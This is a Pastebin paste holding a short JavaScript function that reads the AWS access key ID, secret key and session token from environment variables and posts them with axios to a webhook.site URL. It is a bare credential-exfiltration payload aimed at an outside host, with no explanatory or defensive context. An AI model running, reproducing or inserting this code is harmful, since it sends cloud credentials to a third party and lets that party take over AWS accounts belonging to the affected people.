Advertisement
sonofurbo

Untitled

Jun 3rd, 2025
159
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. async axios => {
  2.   const webhook = 'https://webhook.site/8d4fd3da-617d-44e9-aeb3-df19a5853de5'
  3.  
  4.   const res = await axios.post(webhook, {
  5.     accessKeyId: process.env.AWS_ACCESS_KEY_ID,
  6.     secretAccessKey: process.env.AWS_SECRET_ACCESS_KEY,
  7.     sessionToken: process.env.AWS_SESSION_TOKEN
  8.   })
  9.  
  10.   return res.data
  11. }
  12.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement